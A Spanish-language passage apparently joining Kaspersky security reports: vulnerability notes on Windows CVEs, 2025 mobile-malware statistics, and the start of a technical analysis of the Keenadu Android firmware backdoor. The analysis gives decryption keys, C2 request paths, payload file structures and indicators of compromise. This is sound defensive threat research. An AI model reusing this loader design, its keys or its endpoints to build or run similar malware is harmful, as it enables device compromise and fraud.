Con frecuencia, las vulnerabilidades en controladores se publican para aplicaciones legítimas de terceros incluidas en la distribución oficial del SO, escritas por desarrolladores hace bastante tiempo. Así, la vulnerabilidad CVE-2025-24990 existió en la distribución de Microsoft durante casi toda la historia del desarrollo del SO Windows. El controlador vulnerable se incluía en el SO desde al menos Windows 7 como controlador de terceros para trabajar con Agere Modem. Según el propio Microsoft, este controlador no tiene soporte y, tras identificarse la vulnerabilidad, simplemente fue excluido de la distribución.

La vulnerabilidad es bastante simple: procesamiento inseguro de códigos IOCTL y posterior desreferenciación de puntero nulo (Null Pointer Dereference). Las consecuencias de la explotación pueden incluir la ejecución de comandos maliciosos o, por ejemplo, la aparición de una “pantalla azul de la muerte” (BSOD) en sistemas modernos.

CVE-2025-59287: vulnerabilidad en los servicios WSUS de Microsoft Windows

CVE-2025-59287 representa la variante más simple de deserialización insegura. La explotación es posible sin autenticación; debido a la simplicidad de su uso, esta vulnerabilidad adquirió popularidad muy rápido entre los actores. Los detalles técnicos y los métodos de detección usados por nuestros productos ya fueron descritos en artículos anteriores.

Conclusiones y recomendaciones

En el cuarto trimestre de 2025, las tendencias de registro de vulnerabilidades mantienen su ritmo, por lo que el monitoreo continuo y la aplicación oportuna de parches son tareas cada vez más importantes. Para garantizar una protección estable, resulta crítico evaluar y remediar de forma regular las vulnerabilidades conocidas, así como implementar tecnologías capaces de reducir las consecuencias de su posible explotación.

El monitoreo constante del estado de la infraestructura, incluido el perímetro, permite identificar amenazas con rapidez y prevenir su desarrollo. Una protección eficaz también implica el seguimiento de las amenazas actuales y la aplicación de medidas proactivas para minimizar los riesgos asociados a las deficiencias en los sistemas. El instrumento Kaspersky Next actúa como un socio confiable en este proceso, porque proporciona la identificación oportuna y la descripción detallada de las vulnerabilidades en la infraestructura.

La seguridad de los puestos de trabajo sigue siendo una prioridad: la protección de los dispositivos corporativos requiere la implementación de soluciones capaces de bloquear programas maliciosos y prevenir su propagación. Además de las medidas básicas, las empresas deben implementar sistemas adaptativos que permitan aplicar actualizaciones de seguridad con rapidez y automatizar el manejo de parches.

Desde el tercer trimestre de 2025, ajustamos la metodología de cálculo estadístico basada en Kaspersky Security Network (KSN). Las modificaciones impactaron en todas las secciones del informe, salvo las estadísticas de paquetes de instalación, que permanecieron inalteradas.

Para reflejar la dinámica entre periodos, recalculamos los datos del año previo; por ello, pueden diferir bastante de las cifras ya publicadas. Los siguientes informes emplearán esta nueva metodología a fin de facilitar una comparación precisa con los datos aquí expuestos.

Kaspersky Security Network (KSN) es una red global dedicada al análisis de información anonimizada sobre amenazas, aportada de forma voluntaria por los usuarios de las soluciones de Kaspersky. Las estadísticas de este informe se basan en los datos de KSN, a menos que se indique lo contrario.

Cifras del año

Según Kaspersky Security Network, en 2025:

• Se bloquearon más de 14 millones de ataques que usaban malware, adware o software no deseado para dispositivos móviles.
• La amenaza más común para dispositivos móviles fue, como de costumbre, el adware (AdWare), con 62% del total de amenazas detectadas.
• Se identificaron más de 815 mil paquetes de instalación maliciosos, de los cuales 255 mil eran troyanos bancarios móviles.

Aspectos destacados del año

En 2025, los delincuentes realizaron un promedio mensual de 1.17 millones de ataques contra dispositivos móviles con software malicioso, publicitario o no deseado. Las soluciones de Kaspersky bloquearon un total de 14 059 465 ataques durante el año.

Número de ataques contra los usuarios de soluciones móviles de Kaspersky, 2025 (descargar)

Además del malware mencionado en informes trimestrales previos, en 2025 se identificaron otros troyanos de gran impacto. En particular, en el cuarto trimestre detectamos el backdoor preinstalado Keenadu. El malware se inyecta en el firmware durante el proceso de compilación. El código malicioso se integra en libandroid_runtime.so, biblioteca crítica del entorno de ejecución Java en Android. Esta persistencia permite al backdoor infiltrarse en el espacio de direcciones de toda aplicación activa en el dispositivo. Dependiendo del contexto de la aplicación huésped, el malware ejecuta fraude publicitario: infla impresiones, renderiza banners bajo identidad de terceros o secuestra consultas de búsqueda. Keenadu opera con capacidades extensibles mediante la descarga dinámica y actualización remota de los módulos maliciosos.

Asimismo, los investigadores de seguridad informática descubrieron la botnet IoT Kimwolf, orientada a decodificadores Android TV. Los nodos comprometidos podían lanzar ataques DDoS, operar como proxies inversos y facilitar el control remoto vía shell inversa. Análisis posteriores confirmaron que los actores de amenazas explotaban la capacidad de proxy inverso de Kimwolf para integrar estos dispositivos en redes de salida residenciales (residential proxies).

Otro hallazgo relevante de 2025 fue el troyano espía LunaSpy.

Pantalla del troyano LunaSpy, que se propaga bajo la apariencia de un antivirus

Este troyano, camuflado como solución antivirus, exfiltra credenciales de navegadores y aplicaciones de mensajería, además de interceptar SMS y registros de llamadas. También puede grabar audio con el micrófono del dispositivo y video con la cámara. Esta amenaza tenía como blanco principal de sus ataques a los usuarios rusos.

Estadísticas sobre amenazas móviles

En 2025, el volumen de nuevos paquetes de instalación únicos descendió a 815 735, cifra menor que la del año previo. Tras una contracción moderada en 2024, este indicador registró un descenso de casi un tercio en 2025.

Número de paquetes de instalación maliciosos y no deseados detectados para Android, 2022-2025 (descargar)

La merma global en detecciones obedece a la reducción de muestras de aplicaciones clasificadas como not-a-virus. En contraposición, el volumen de troyanos experimentó un crecimiento agresivo, según detalla la distribución por tipos.

Distribución por tipo de los paquetes encontrados

Distribución* por tipo de los programas móviles detectados, 2024 y 2025 (descargar)

*Los datos del año previo pueden diferir de los publicados anteriormente debido a la revisión retrospectiva de algunos veredictos.

El aumento considerable en aplicaciones de las categorías Trojan-Banker y Trojan-Spy coincidió con la reducción de los archivos AdWare y RiskTool.

Los troyanos bancarios con mayor presencia fueron Mamont (49.8%) y Creduz (22.5%). En el ámbito de la publicidad intrusiva, destacan MobiDash (39%), Adlo (27%) y HiddenAd (20%).

Porcentaje* de usuarios atacados por un determinado tipo de malware o software no deseado, del total de los usuarios de productos móviles de Kaspersky atacados, 2024 y 2025 (descargar)

*El total puede exceder el 100% si los mismos usuarios se enfrentan a varios tipos de ataques.

El malware de tipo Trojan-Banker incrementó sus cifras tanto en volumen de archivos como en frecuencia de ataques. No obstante, se posicion en cuarto lugar, superado ampliamente por la familia Trojan, dominada por variantes de Triada y estafas de Fakemoney.

TOP 20 de malware móvil

La siguiente clasificación de malware no incluye programas potencialmente peligrosos o no deseados como RiskTool y AdWare.

*Porcentaje de usuarios únicos que se enfrentaron a este malware, del total de usuarios de las soluciones móviles de Kaspersky que sufrieron ataques.

La mayor parte de la lista la ocupan troyanos de la familia Triada, que se distribuyen como modificaciones maliciosas de aplicaciones de mensajería populares. Otra vía de infección: se invita a la víctima a instalar la aplicación original de mensajería en un “entorno virtual personalizado”, donde supuestamente se puede configurar el funcionamiento de la aplicación. Las aplicaciones de estafa Fakemoney se ubicaron en el tercer puesto de nuestras estadísticas, dado que persisten en sus ataques frecuentes mediante engaños de inversión falsa y promesas de pagos inexistentes. Los troyanos bancarios Mamont se sitúan en las posiciones 6, 8 y 18. En el noveno lugar está el backdoor Triada, preinstalado en el firmware de ciertos dispositivos.

Malware por región

En esta sección describimos malware cuyos ataques se concentran en países específicos.

*El país con mayor actividad del malware
**Porcentaje de usuarios únicos que se enfrentaron con este malware en un país determinado, del total de usuarios de las soluciones móviles de Kaspersky atacados por el mismo malware.

Los usuarios de Turquía fueron los más afectados por ataques de troyanos bancarios Coper y sus droppers Hqwar. En India persistió la propagación de los troyanos Rewardsteal, diseñados para sustraer datos financieros bajo el pretexto de transferencias de fondos. También en la India, se reanudó la actividad del troyano Thamera, cuyos frecuentes ataques detectamos en 2023. Este malware registra cuentas en redes sociales desde el dispositivo de la víctima.

Trojan-Proxy.AndroidOS.Agent.q, que dirige sus ataques a Alemania, se distribuyó a través de una aplicación de terceros para consultar los descuentos de una cadena de tiendas alemana. Los actores de amenazas sustrajeron fondos de las víctimas mediante el uso no autorizado del dispositivo del cliente como punto de salida de proxy.

Los ataques con troyanos Pylcasa, usados para redirigir usuarios a páginas de phishing o sitios de casinos ilegales, se centraron en Brasil en 2025.

Troyanos bancarios para dispositivos móviles

La cantidad de nuevos paquetes de instalación de troyanos bancarios aumentó de forma abrupta y alcanzó 255 090 paquetes, lo que supera por mucho los indicadores de años anteriores.

Número de paquetes de instalación de troyanos bancarios móviles detectados por Kaspersky, 2022-2025 (descargar)

Cabe destacar que el número total de ataques con troyanos bancarios también aumentó en un 150 % respecto al año anterior. Considerando el fuerte incremento en paquetes de instalación de estos malware, podemos inferir que estos ataques generan grandes beneficios para los actores de amenazas. Esto se confirma porque los ciberdelincuentes siguen mejorando los canales de distribución de malware y creando más modificaciones nuevas en un intento de burlar la detección por parte de las soluciones de seguridad.

TOP 10 de troyanos bancarios para dispositivos móviles

*Porcentaje de usuarios únicos que se han enfrentado a este malware, del total de usuarios de las soluciones de seguridad móvil de Kaspersky atacados por amenazas bancarias.

En 2025 observamos una intensa actividad de los troyanos bancarios Mamont, que ocuparon cerca de la mitad del total de las nuevas aplicaciones de su categoría, y también se usaron en la mitad de todos los ataques con troyanos bancarios.

Conclusión

En 2025 se mantuvo la tendencia decreciente en el volumen total de paquetes únicos de software no deseado. Al mismo tiempo, registramos un aumento notable en la detección de ciertas amenazas respecto al año anterior, en particular troyanos bancarios y spyware móviles, aunque la mayoría de las amenazas detectadas siguieron siendo aplicaciones de tipo adware.

Entre las amenazas móviles, destacamos el incremento de backdoors preinstalados en firmware, en particular de las familias Triada y Keenadu. Al igual que el año pasado, algunos programas maliciosos móviles continúan distribuyéndose a través de tiendas oficiales de aplicaciones. Asimismo, evidenciamos un interés creciente de los actores de amenazas por reclutar dispositivos infectados para usarlos como nodos proxy.

En abril de 2025 describimos una versión, nueva en aquel momento, del backdoor Triada, que infectaba los firmwares de dispositivos Android falsificados distribuidos a través de marketplaces populares. El malware se ubicaba en las particiones del sistema de los firmwares y penetraba en Zygote (el proceso padre de todas las aplicaciones en el sistema), lo que provocaba la infección de cualquier aplicación en el dispositivo. Esto permitía que el troyano pudiera robar credenciales de mensajeros y redes sociales, entre otras cosas.

El hallazgo nos motivó a realizar una investigación y buscar otras amenazas en los firmwares de dispositivos Android. Así descubrimos el nuevo backdoor Keenadu, que, al igual que Triada, se incrustaba en los firmwares e infectaba cada aplicación que se ejecutase en el dispositivo. El backdoor ya estaba muy expandido: cuando se lo descubrió, nuestros usuarios comenzaron a contactar en masa al servicio de soporte para obtener información sobre esta amenaza. El objetivo de este informe es disipar dudas y describir la nueva amenaza.

Estas son nuestras conclusiones:

• Descubrimos una nueva puerta trasera, denominada Keenadu, en el firmware de dispositivos de varias marcas. Fue introducida durante el proceso de compilación: una biblioteca estática maliciosa se vinculaba con libandroid_runtime.so. Una vez en el dispositivo, al igual que Triada, infectaba el proceso Zygote. En algunos casos, el firmware malicioso se instalaba mediante una actualización OTA.
• Una copia del backdoor se inyectaba en el espacio de direcciones de cada aplicación al ejecutarse en el dispositivo. El malware es un cargador multinivel que otorga a los atacantes control casi ilimitado sobre el dispositivo de la víctima.
• Logramos obtener las cargas útiles que descarga Keenadu. Según la aplicación infectada, sustituyen búsquedas en el navegador, monetizan instalaciones de apps y manipulan en secreto elementos publicitarios.
• Una de las cargas útiles obtenidas durante la investigación también se encontró en múltiples aplicaciones que se distribuían tanto a través de fuentes no oficiales como a través de Google Play y Xiaomi GetApps.
• En los firmwares de algunos dispositivos, Keenadu estaba integrado en aplicaciones clave del sistema: servicio de reconocimiento facial, aplicación de escritorio, etc.
• Durante la investigación logramos establecer que existía una conexión entre las botnets de Android más grandes: Triada, BADBOX, Vo1d y Ke

La cadena completa de infección de Keenadu es la siguiente:

Esquema completo de la infección

Las soluciones de Kaspersky detectan las amenazas descritas abajo con los siguientes veredictos:

HEUR:Backdoor.AndroidOS.Keenadu.*
HEUR:Trojan-Downloader.AndroidOS.Keenadu.*
HEUR:Trojan-Clicker.AndroidOS.Keenadu.*
HEUR:Trojan-Spy.AndroidOS.Keenadu.*
HEUR:Trojan.AndroidOS.Keenadu.*
HEUR:Trojan-Dropper.AndroidOS.Gegu.*

Dropper malicioso en libandroid_runtime.so

Al inicio de la investigación, nos llamaron la atención bibliotecas sospechosas ubicadas en las rutas /system/lib/libandroid_runtime.so y /system/lib64/libandroid_runtime.so (en adelante, para abreviar, usaremos la representación /system/lib[64]/ para designar estos dos directorios). Tal biblioteca existe en la plataforma legítima de Android. En particular, en ella se define el método nativo println_native para la clase android.util.Log. Las aplicaciones lo usan para escribir en el registro logcat. En las bibliotecas sospechosas, la implementación de este método llamaba a una función adicional, a diferencia de las bibliotecas legítimas.

Llamada a una función sospechosa

La función sospechosa descifraba datos del cuerpo de la biblioteca usando RC4 y los escribía en la ruta /data/dalvik-cache/arm[64]/system@framework@[email protected]. Estos datos son la carga útil que se introduce mediante DexClassLoader. El punto de entrada en ella es el método main de la clase com.ak.test.Main, donde es probable que ak haga referencia al nombre del malware que le dio el autor, considerando que esta combinación de letras también se usa en otros lugares del código. En particular, los desarrolladores dejaron mucho código que registra mensajes de error del malware en logcat durante su ejecución. Para estos mensajes se usa la etiqueta AK_CPP.

Descifrado de la carga útil

La carga útil verifica si no se está ejecutando en aplicaciones del sistema del conjunto de servicios de Google, así como en aplicaciones del sistema de los operadores Sprint y T-Mobile. Estas versiones suelen corresponder a dispositivos que los operadores venden a bajo costo a cambio de que el usuario firme un contrato de servicios de telecomunicaciones. Si el malware se ejecuta en tales procesos, detiene sus operaciones. También tiene implementado un mecanismo para dejar de funcionar si en los directorios del sistema hay archivos con determinados nombres.

Luego, el troyano verifica si se está ejecutando en el proceso system_server. Este proceso gestiona todo el sistema y tiene privilegios máximos. Lo inicia el proceso Zygote al comienzo de su trabajo. Si el resultado de la verificación es positivo, el troyano crea una instancia de la clase AKServer; pero si el código funciona en cualquier otro proceso, se crea una instancia de la clase AKClient. En el objeto creado se invoca un método al que se le pasa el nombre del proceso de la aplicación. Los nombres de las clases sugieren que el troyano se basa en una arquitectura cliente-servidor.

Inicio de system_server en Zygote

El proceso system_server crea e inicia diversos servicios del sistema mediante la clase SystemServiceManager. En la base de estos servicios está la arquitectura cliente-servidor, y los clientes se solicitan en el código de las aplicaciones mediante la llamada al método Context.getSystemService. La comunicación con el servidor se realiza mediante binder, el mecanismo nativo de comunicación entre procesos (IPC) de Android. Este enfoque tiene múltiples ventajas, incluso desde el punto de vista de la seguridad. Entre ellas está la posibilidad de restringir a algunas aplicaciones el acceso a diversos servicios del sistema y sus funciones. Otra ventaja es la presencia de abstracciones que permiten simplificar el uso de este acceso para los desarrolladores y al mismo tiempo proteger el sistema de posibles vulnerabilidades en las aplicaciones.

Los autores de Keenadu adoptaron un enfoque similar. La lógica principal se encuentra en la clase AKServer, que funciona en el proceso system_server. AKServer funciona como un servicio del sistema malicioso, mientras que <>codeAKClient actúa como stub (proxy) que permite invocar métodos remotos en AKServer a través de binder. A continuación presentamos un diagrama del funcionamiento del backdoor:

Esquema de funcionamiento del backdoor Keenadu

Aquí cabe resaltar que Keenadu vuelve a comprometer los principios básicos de seguridad de Android. En primer lugar, dado que está integrado en libandroid_runtime.so, funciona en el contexto de cada aplicación en el dispositivo, obteniendo así acceso a todos sus datos y haciendo que el aislamiento de aplicaciones entre sí previsto por el sistema carezca de sentido. En segundo lugar, proporciona interfaces para burlar los permisos (de los que hablaremos más adelante) que regulan los derechos de las aplicaciones en el sistema. De esta forma, estamos ante un backdoor de pleno derecho, que permite a los atacantes obtener control casi ilimitado sobre el dispositivo de la víctima.

Arquitectura de AKClient

AKClient está estructurado de forma bastante simple. Se integra en todas las aplicaciones que se ejecutan en el dispositivo y obtiene una instancia de la interfaz para comunicarse con el servidor mediante un mensaje de difusión protegido (protected broadcast) com.action.SystemOptimizeService. Mediante binder, este stub invoca el método attach en AKServer, pasando como parámetro un objeto IBinder que encapsula la lógica para cargar DEX arbitrarios en el contexto de la aplicación infectada. Esto permite a AKServer ejecutar cargas útiles maliciosas según la aplicación afectada.

Arquitectura de AKServer

AKServer, al inicio de su trabajo, envía dos mensajes de difusión protegidos (protected broadcast): com.action.SystemOptimizeService y com.action.SystemProtectService. El primer mensaje, como ya hemos mencionado, transmite a otros procesos infectados con AKClient una instancia de la interfaz para interactuar con AKServer. Junto con el mensaje com.action.SystemProtectService también se transmite una instancia de otra interfaz para interactuar con AKServer. Mediante esta interfaz, los módulos maliciosos descargados en los contextos de otras aplicaciones pueden:

• otorgar cualquier permiso a cualquier aplicación en el dispositivo;
• revocar cualquier permiso de cualquier aplicación en el dispositivo;
• obtener la geolocalización del dispositivo;
• obtener información sobre el dispositivo.

Interfaz maliciosa para administrar permisos y obtener datos sobre el dispositivo

Después de que se configura la interacción entre la parte del servidor y del cliente, AKServer inicia la tarea maliciosa principal llamada MainWorker. En su primer inicio, MainWorker guarda la hora actual. Después, el malware verifica el idioma del dispositivo y su zona horaria. Si el idioma de la interfaz es uno de los dialectos del chino y el dispositivo mismo está ubicado en una de las zonas horarias chinas, termina su trabajo. Tampoco funcionará si su dispositivo no tiene la tienda de aplicaciones Google Play o los servicios de Google Play. Si el dispositivo pasa las verificaciones, el troyano inicia la tarea PluginTask. PluginTask descifra las direcciones de los servidores de comando y control del código de la siguiente manera:

1. La cadena con la dirección cifrada se decodifica mediante Base64.
2. Los datos obtenidos (un búfer comprimido con gzip) se descomprimen.
3. Los datos descomprimidos se descifran mediante AES-128 en modo CFB. La clave para el descifrado es el MD5 de la cadena ota.host.ba60d29da7fd4794b5c5f732916f7d5c, el vector de inicialización es la cadena 0102030405060708.

Después de descifrar las direcciones de los servidores de comando y control, el troyano recopila datos sobre el dispositivo de la víctima: modelo, IMEI, dirección MAC, versión del SO, etc., y los cifra de la misma manera que las direcciones de los servidores, solo que como clave AES se usa el MD5 de la cadena ota.api.bbf6e0a947a5f41d7f5226affcfd858c. Los datos cifrados se envían al servidor de comando y control mediante una solicitud POST a la ruta /ak/api/pts/v4. Se transmiten dos valores a los parámetros de la solicitud:

• m: MD5 del IMEI del dispositivo;
• n: tipo de conexión a la red (w: Wi-Fi, m: internet móvil).

La respuesta del servidor de comando y control contiene el campo code, en el que puede haber un código de error devuelto por el servidor. Si el valor de este campo es igual a cero, no hay error. En este caso, en la respuesta habrá un campo data: un JSON cifrado de forma análoga a los datos de la solicitud con información sobre las cargas útiles.

Cómo Keenadu llegó a libandroid_runtime.so

Después del análisis de las primeras etapas de infección, decidimos averiguar de qué forma exacta el backdoor llegaba a los firmwares de dispositivos Android. Casi de inmediato descubrimos en fuentes abiertas en la red quejas de usuarios de tabletas del fabricante Alldocube sobre consultas DNS sospechosas desde los dispositivos. Este proveedor ya había reconocido la presencia de software malicioso en uno de los modelos de tabletas. Pero en la declaración publicada por la compañía no había ningún detalle sobre cuál era el malware específico que llegó a los dispositivos y cómo había sucedido esto. Intentaremos responder a estas preguntas.

Reclamo de un usuario sobre consultas DNS sospechosas

Las consultas DNS descritas por el autor del reclamo también nos parecieron extrañas. Según nuestros datos, los dominios C2 de Keenadu obtenidos en ese momento se resolvían en las direcciones IP que se presentan a continuación.

• 67.198.232[.]4
• 67.198.232[.]187

En estas mismas direcciones se resolvían los dominios keepgo123[.]com y gsonx[.]com, lo que puede indicar que la tableta del autor del reclamo también está infectada con Keenadu. Sin embargo, una sola coincidencia de direcciones IP no es suficiente para afirmarlo con certeza. Para verificar la hipótesis, es necesario estudiar el dispositivo mismo. Consideramos la opción de adquirir el mismo modelo de tableta, pero no fue necesario: Alldocube publica archivos con firmware para sus dispositivos en acceso abierto, por lo que cualquier interesado puede verificarlos en busca de software malicioso.

Para analizar el firmware, primero es necesario estudiar en qué formato se almacena el contenido. Los firmwares para dispositivos Alldocube son archivos RAR que contienen diversas imágenes y otros archivos, así como una utilidad para flashear en formato de archivo ejecutable para Windows. El mayor valor desde el punto de vista del análisis lo representa el sistema de archivos de Android. Sus particiones principales, incluida la del sistema, se encuentran en una de las imágenes llamada super.img. Este es un archivo Android Sparse Image. Para abreviar la exposición, omitiremos describir formato (se lo puede, por ejemplo, recuperar del código de libsparse); solo señalaremos que existen utilidades con código abierto para extraer particiones de tales archivos en forma de imagen del sistema de archivos.

Extrajimos libandroid_runtime.so del firmware para Alldocube iPlay 50 mini Pro (T811M) del 18 de agosto de 2023. Al estudiar la biblioteca, descubrimos en ella el backdoor Keenadu. Además, desciframos la carga útil y extrajimos de allí las direcciones de los servidores de comando y control, que se ubicaban en los dominios keepgo123[.]com y gsonx[.]com, lo que confirma las sospechas del usuario: sus dispositivos están infectados con este mismo backdoor. Además, todas las versiones posteriores de firmwares para este modelo también resultaron infectadas, incluidas las que salieron después de la publicación de la declaración del proveedor.

Se debe prestar atención especial a los firmwares para el modelo Alldocube iPlay 50 mini Pro NFE. La abreviatura NFE (Netflix Enabled) en su nombre significa que tales dispositivos tienen un módulo DRM adicional que permite usar servicios de streaming en alta calidad. Para ello, deben cumplir con el estándar Widevine L1 del sistema de protección de medios premium Google Widevine DRM. En consecuencia, procesan medios en TEE (Trusted Execution Environment), lo que reduce el riesgo de acceso a la película o serie por parte de código no confiable y, como consecuencia, no permite copiar medios sin autorización. Aunque la certificación por Widevine no protegió estos dispositivos de la infección, a diferencia de otros modelos, el primer firmware de Alldocube iPlay 50 mini Pro NFE, lanzado el 7 de noviembre de 2023, estaba limpio. Al mismo tiempo, todos los demás, incluida la versión más reciente del 20 de mayo de 2024, contenían Keenadu.

Durante el análisis de firmware para dispositivos Alldocube, descubrimos que todos tienen una firma válida. Esto significa que, para integrar el backdoor en libandroid_runtime.so, no fue suficiente que el atacante hackease el servidor de actualizaciones OTA. Además, era necesario darse modos para apoderarse de las claves para su firma, que en condiciones normales no deberían ser accesibles desde el servidor OTA. Lo más probable es que el troyano haya llegado al firmware durante la etapa de compilación.

También logramos descubrir la biblioteca estática libVndxUtils.a (ca98ae7ab25ce144927a46b7fee6bd21), que contiene el código de Keenadu, lo que confirma nuestra hipótesis. Esta biblioteca maliciosa está escrita en lenguaje C++ y compilada mediante el sistema de compilación CMake. Es interesante que en la biblioteca también quedaron las rutas a los archivos con código fuente en la computadora del desarrollador.

• D:\work\git\zh\os\ak-client\ak-client\loader\src\main\cpp\__log_native_load.cpp: en este archivo se encuentra el código del dropper.
• D:\work\git\zh\os\ak-client\ak-client\loader\src\main\cpp\__log_native_data.cpp: en este archivo se encuentra la carga útil cifrada mediante RC4, así como su tamaño.

El punto de entrada del dropper es la función __log_check_tag_count. El atacante insertó la llamada de esta función en la implementación del método println_native.

Fragmento de código donde el atacante insertó la llamada maliciosa

Según nuestros datos, la dependencia maliciosa se ubicaba en el repositorio con el código fuente del firmware en las siguientes rutas:

• vendor/mediatek/proprietary/external/libutils/arm/libVndxUtils.a
• vendor/mediatek/proprietary/external/libutils/arm64/libVndxUtils.a

Es interesante que el troyano en libandroid_runtime.so descifra y escribe en el disco la carga útil en la ruta /data/dalvik-cache/arm[64]/system@framework@[email protected]. Lo más probable es que el atacante estuviese intentando disfrazar la dependencia maliciosa libandroid_runtime.so como un componente vndx que se supone que es legítimo, con código propietario del proveedor MediaTek. En realidad, tal componente no existe en los productos de MediaTek.

Por último, según los datos de nuestra telemetría, el troyano se encuentra no solo en dispositivos Alldocube, sino también en dispositivos de otros fabricantes. En todos los casos, el backdoor está integrado en firmwares para tabletas. A los proveedores mencionados les advertimos de la infección.

Basándonos en todo lo anterior, consideramos que Keenadu llegó a los firmwares de dispositivos Android como resultado de un ataque a la cadena de suministro: una de las etapas de la cadena de suministro del firmware resultó comprometida, lo que introdujo una dependencia maliciosa en sus códigos fuente. De esta forma, los proveedores podrían no sospechar que sus dispositivos ya estaban infectados antes de ponerlos en venta.

Módulos del backdoor Keenadu

Como ya señalamos, Keenadu, debido a su arquitectura, permite a los atacantes obtener un control casi ilimitado sobre el dispositivo de la víctima. Para entender de qué forma exacta aprovecharon esta característica del backdoor, decidimos analizar las cargas útiles que descarga. Para ello, creamos una solicitud en nombre de un dispositivo infectado para el servidor de comando y control. El servidor C2 no envió ningún archivo como respuesta a nuestra primera solicitud. En su lugar, devolvió la hora y fecha para la siguiente solicitud: 2.5 meses después de la primera. Durante el análisis del servidor de comando y control mediante el método de “caja negra”, logramos establecer que la solicitud contiene la hora y fecha de activación del backdoor, y si desde su momento no han pasado 2.5 meses, el C2 no devuelve cargas útiles. Es probable que esto se haya hecho para dificultar el análisis y disminuir la probabilidad de detección de estas cargas. Después de que cambiamos en la solicitud el momento de la activación a uno más antiguo, el servidor de comando y control nos devolvió una lista de cargas útiles para análisis.

El servidor de los atacantes envía información sobre las cargas útiles en forma de array de objetos. Cada uno de estos objetos contiene un enlace para descargar la carga útil, así como su MD5, nombres de paquetes de aplicaciones objetivo, nombres de procesos objetivo, etc. A continuación se presenta un ejemplo de tal objeto. Los atacantes eligieran Alibaba Cloud para construir la CDN.

Ejemplo de información sobre la carga útil

Los archivos descargados por Keenadu tienen su propio formato, en el que se almacena la carga útil cifrada y su configuración. La descripción del formato del archivo en pseudocódigo se presenta a continuación (struct KeenaduPayload):

struct KeenaduChunk {
    uint32_t size;
    uint8_t data[size];
} __packed;

struct KeenaduPayload {
    int32_t version;
    uint8_t padding[0x100];
    uint8_t salt[0x20];
    KeenaduChunk config;
    KeenaduChunk payload;
    KeenaduChunk signature;
} __packed;

Después de la descarga, Keenadu verifica la integridad del archivo mediante MD5. Además, los autores del troyano implementaron un mecanismo de firma de código mediante el algoritmo DSA, que se verifica antes del descifrado y ejecución de la carga útil. Esto significa que solo el atacante que posee la clave privada puede crear cargas útiles maliciosas. Si la verificación de la firma es exitosa, la configuración y el módulo malicioso se descifran mediante AES-128 en modo CFB. La clave para el descifrado es el hash MD5 calculado de la concatenación de la cadena 37d9a33df833c0d6f11f1b8079aaa2dc con la “sal” (salt), y el vector de inicialización es la cadena 0102030405060708.

La configuración contiene información sobre los puntos de entrada y salida del módulo, su nombre y versión. A continuación, se presenta un ejemplo de configuración de uno de los módulos.

{
    "stopMethod": "stop",
    "startMethod": "start",
    "pluginId": "com.ak.p.wp",
    "service": "1",
    "cn": "com.ak.p.d.MainApi",
    "m_uninit": "stop",
    "version": "3117",
    "clazzName": "com.ak.p.d.MainApi",
    "m_init": "start"
}

Ahora que ya hemos descrito el algoritmo de carga de módulos maliciosos por el backdoor, pasemos a analizarlo.

Cargador de Keenadu

Este módulo (MD5: 4c4ca7a2a25dbe15a4a39c11cfef2fb2) está dirigido a reconocidas tiendas en línea, con los siguientes nombres de paquetes:

• com.amazon.mShop.android.shopping (Amazon)
• com.zzkko (SHEIN)
• com.einnovation.temu (Temu)

Su punto de entrada es el método start de la clase com.ak.p.d.MainApi. Esta clase inicia la tarea maliciosa llamada HsTask. Es un cargador cuyo concepto es similar a AKServer. Al inicio de su trabajo, el cargador recopila datos sobre el dispositivo infectado (modelo del dispositivo, IMEI, dirección MAC, versión del SO, etc.), así como información sobre la aplicación en la que funciona. Los datos obtenidos se codifican de la misma manera que las solicitudes de AKServer en la ruta /ak/api/pts/v4. Después de codificarlos, el cargador envía los datos mediante una solicitud POST al servidor C2 en la ruta /ota/api/tasks/v3.

Recopilación de datos por el plugin

En respuesta, el servidor de los atacantes devuelve una lista de módulos que descargar y ejecutar, así como una lista de archivos APK para instalar en el dispositivo de la víctima. Es interesante que, en las nuevas versiones de Android, la entrega de estos APK se implementa a través de sesiones de instalación. Es probable que sea la forma en que el malware intenta eludir las restricciones introducidas en las últimas versiones del SO: las aplicaciones provenientes de terceros no pueden obtener en ellas acceso a permisos peligrosos, en particular a Accesibilidad.

Uso de la sesión de instalación

Por desgracia, durante la investigación no logramos obtener ejemplos de los módulos y archivos APK que descarga este cargador. Sin embargo, los usuarios en la red reclamaron que las tabletas infectadas agregaban productos a los carritos de las tiendas sin informar al usuario.

Reclamo de un usuario en Reddit

Cargador de clickers

Estos módulos (ejemplo: ad60f46e724d88af6bcacb8c269ac3c1) se integran en las siguientes aplicaciones:

• Administrador de fondos de pantalla del sistema (com.android.wallpaper)
• YouTube (com.google.android.youtube)
• Facebook (com.facebook.katana)
• Bienestar digital (com.google.android.apps.wellbeing)
• Lanzador del sistema (com.android.launcher3)

El módulo malicioso comienza sus operaciones obtieniendo datos sobre la ubicación y la dirección IP del dispositivo mediante el servicio GeoIP desplegado en el servidor de comando y control de los atacantes. Los datos conseguidos, así como el tipo de conexión a la red y la versión del SO, se envían al servidor de comando y control. Este, en respuesta, devuelve un archivo de formato especial, que contiene un JSON cifrado con información sobre las cargas útiles y la clave para descifrarlo mediante XOR. La estructura de este archivo se describe a continuación, usando pseudocódigo.

struct Payload {
    uint8_t magic[10]; // == "encrypttag"
    uint8_t keyLen;
    uint8_t xorKey[keyLen];
    uint8_t payload[];
} __packed;

El JSON obtenido después del descifrado representa un array de objetos con enlaces para descargar cargas útiles, así como información sobre los puntos de entrada. A continuación se presenta un ejemplo de tal objeto. Las cargas útiles están cifradas según el mismo principio que el JSON con información sobre ellas.

Ejemplo de información sobre la carga útil

Durante la investigación obtuvimos varias cargas útiles, cuyo objetivo principal es la interacción con elementos publicitarios en sitios de diversa temática (sitios de juegos, sitios de recetas, sitios de noticias). El módulo interactúa con un sitio concreto, cuya dirección está codificada en su código.

Módulo para el navegador Chrome

El módulo (MD5: 912bc4f756f18049b241934f62bfb06c) está dirigido al navegador Google Chrome (com.android.chrome). Lo primero que hace es registrar un manejador (handler) de eventos del ciclo de vida de las actividades de la aplicación (Activity Lifecycle Callbacks). Al iniciar cada actividad en la aplicación objetivo, este manejador verifica su nombre. Si coincide con ChromeTabbedActivity, el troyano busca el campo de entrada de texto (consultas de búsqueda y direcciones de sitios web) llamado url_bar.

Búsqueda del elemento de texto url_bar

